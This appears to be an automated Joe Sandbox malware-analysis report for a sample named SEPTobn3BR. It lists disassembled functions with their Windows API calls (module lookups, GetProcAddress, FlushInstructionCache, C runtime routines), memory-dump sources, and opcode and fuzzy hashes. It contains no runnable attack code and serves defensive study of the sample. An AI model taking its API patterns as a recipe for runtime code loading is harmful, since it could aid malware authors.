                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                              • Instruction ID: 4ebed44dfc9d5030ca14a01f74b4ffed1e95a04481778ac5351ed666df7f3848
                                                              • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                              • Instruction Fuzzy Hash: F04129B2A00714AFD7259F78CC41B9A7BEBEB89710F14452AF019DB681DBB19A059F80
                                                              Function 02B8E170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E21F
                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E23B
                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E2B2
                                                              • VariantClear.OLEAUT32(?), ref: 02B8E2DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                              • String ID:
                                                              • API String ID: 920484758-0
                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                              • Instruction ID: e164d1e99a325540b15e50a628cddb64a20d26c671c6ee6d7e0287f7c442ac9d
                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                              • Instruction Fuzzy Hash: 2C41E775A0062A9BCB61EF68CC90BD9B3BDAF49614F4042D6E64CA7251DA30EF80CF51
                                                              Function 02B8ACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                                                              • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                              • String ID:
                                                              • API String ID: 3990497365-0
                                                              • Opcode ID: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
                                                              • Instruction ID: 020d07a2367a52c669e6449164ada2ba124696ac4a3ed9fb31f1c5f40dee9df3
                                                              • Opcode Fuzzy Hash: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
                                                              • Instruction Fuzzy Hash: DA411A71A402589BDB61EB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50
                                                              Function 02B8ACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                                                              • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                              • String ID:
                                                              • API String ID: 3990497365-0
                                                              • Opcode ID: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
                                                              • Instruction ID: c11526136f2661489bc28ee0db205843ce0011f901268799c4cfeae0d4b59900
                                                              • Opcode Fuzzy Hash: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
                                                              • Instruction Fuzzy Hash: 2B413C71A402589BDB61FB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50
                                                              Function 02C18B8F Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 02C18BA6
                                                                • Part of subcall function 02C191DE: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 02C1920D
                                                                • Part of subcall function 02C191DE: ___AdjustPointer.LIBCMT ref: 02C19228
                                                              • _UnwindNestedFrames.LIBCMT ref: 02C18BBD
                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 02C18BCF
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 02C18BF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                              • String ID:
                                                              • API String ID: 2901542994-0
                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction ID: 71a4ab48879f547eb3e74cb8191a0da6d9428b87dbd0948d47045fbb436a7832
                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction Fuzzy Hash: 23011332004109BBDF12AF55CC06EDA3BAAFF8A754F054214FE1866120C336E5A1FFA0
                                                              Function 02C1825D Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02C1825D
                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02C18262
                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02C18267
                                                                • Part of subcall function 02C19766: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02C19777
                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02C1827C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                              • String ID:
                                                              • API String ID: 1761009282-0
                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction ID: d80e862715f26897bb8bcd9792e3bfdad42af9d03849ac2f3ebfbfb2fc56639e
                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction Fuzzy Hash: 3FC04C04408941543C963EB212272EE53570DA37C5BC41AD0C8A4175128A2A0A0F7CF7
                                                              Function 02BE991A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02BE991F
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02BE99BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8H_prologThrow
                                                              • String ID: OE
                                                              • API String ID: 3222999186-2506519113
                                                              • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                              • Instruction ID: b1d067ab2a5fc167c51613f7376c5fa0b4f7b16d466d200ccea31ec069d9a5b2
                                                              • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                              • Instruction Fuzzy Hash: 03B14D729001089BCF15FBA0DC91AEDB7BAAF14310F5042D9E517AB1A1EF34AB48CF91
                                                              Function 02C240B9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __freea
                                                              • String ID: H"G$H"GH"G
                                                              • API String ID: 240046367-3036711414
                                                              • Opcode ID: 85d5c5bb78c3dc120d65423bccd5b238d1fe586f27ad34d61dd2e41aacc264b2
                                                              • Instruction ID: afbcfdce6c7b16054f1ed2d1f2ef742d63d30fba0d352430781538bf0b20781b
                                                              • Opcode Fuzzy Hash: 85d5c5bb78c3dc120d65423bccd5b238d1fe586f27ad34d61dd2e41aacc264b2
                                                              • Instruction Fuzzy Hash: 6C416971A002319FCB39AF65CC01EAE77E5EF57760B140125E818DB280EF30CA48DB92
                                                              Function 02C2D6C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02C26CB1: _free.LIBCMT ref: 02C26CE8
                                                                • Part of subcall function 02C26CB1: _abort.LIBCMT ref: 02C26D2F
                                                                • Part of subcall function 02C2D7E3: _abort.LIBCMT ref: 02C2D815
                                                                • Part of subcall function 02C2D7E3: _free.LIBCMT ref: 02C2D849
                                                              • _free.LIBCMT ref: 02C2D73C
                                                              • _free.LIBCMT ref: 02C2D772
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$_abort
                                                              • String ID: pF
                                                              • API String ID: 195396716-2973420481
                                                              • Opcode ID: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                                              • Instruction ID: 586680eadd049e74193475d3eae55b9ce39eed9d80038e4ce4f8a77fd1652b62
                                                              • Opcode Fuzzy Hash: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                                              • Instruction Fuzzy Hash: D1313B35900128EFDB11EF69D440BADBBF5EF91720F214099D8059B290EF755E48DF51
                                                              Function 02B81C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
                                                              • Instruction ID: e7e8d43b6d87b14230742a0b747fface9432644492f52e218fd486c63ae28868
                                                              • Opcode Fuzzy Hash: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
                                                              • Instruction Fuzzy Hash: 76A1A4A67326014BE718BA7C9D943ADB3C6DB84265F1C42BEE21DCB281EB64C953C750
                                                              Function 02B89474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B894FA
                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B89500
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DateFormatLocaleThread
                                                              • String ID: yyyy
                                                              • API String ID: 3303714858-3145165042
                                                              • Opcode ID: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
                                                              • Instruction ID: 7a0757d37afb60cab30fe9307f88379dbdff6631a451916c2a4dc3c31c37de7b
                                                              • Opcode Fuzzy Hash: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
                                                              • Instruction Fuzzy Hash: 9F216875A006189FDF21EBA8C881AFEB3F9EF48710F4500E5E909E7341D6309E04CBA5
                                                              Function 02C1B941 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02C1BA06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @F$@F
                                                              • API String ID: 4062629308-3436687868
                                                              • Opcode ID: 01fc5d24cbcc55c590743250a7815fc602d781154dc714b2f4e2244749786215
                                                              • Instruction ID: c32418232edee1e5069fe1bc8b9c78a4adc01509451f138612b4b917c2126f04
                                                              • Opcode Fuzzy Hash: 01fc5d24cbcc55c590743250a7815fc602d781154dc714b2f4e2244749786215
                                                              • Instruction Fuzzy Hash: 4F210E716101009AD7186B349C4776E33A29F8333CF28431AE4359B2E4E7748E43FE56
                                                              Function 02C1BD80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02C1BE48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @F$@F
                                                              • API String ID: 4062629308-3436687868
                                                              • Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                                              • Instruction ID: 7c0d2241a3757542deaed8aa5bde8ef992dd27a873f4c635489280076e75903b
                                                              • Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                                              • Instruction Fuzzy Hash: 18210771A106508BC7187B388C077AD73925F8773CF284359E5319B2D4EB788E42BE56
                                                              Function 02B9818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B98216), ref: 02B981F8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                              • String ID: FlushInstructionCache$Kernel32
                                                              • API String ID: 3811539418-184458249
                                                              • Opcode ID: 69ceee381967f7be42335949b5fceccb2dc7045a0664700b0ae60675d39717dc
                                                              • Instruction ID: 77a680fe85888330406975052b13d19366db9062b7ed9f9b1463d61439dda31a
                                                              • Opcode Fuzzy Hash: 69ceee381967f7be42335949b5fceccb2dc7045a0664700b0ae60675d39717dc
                                                              • Instruction Fuzzy Hash: DF014675650304BFEF11EEA8DC42B5E77ADEB4AB40FA188A1F508E7A40D674AD108A24
                                                              Function 02C2D7E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02C26CB1: _free.LIBCMT ref: 02C26CE8
                                                                • Part of subcall function 02C26CB1: _abort.LIBCMT ref: 02C26D2F
                                                              • _abort.LIBCMT ref: 02C2D815
                                                              • _free.LIBCMT ref: 02C2D849
                                                              Strings
                                                              Memory Dump Source
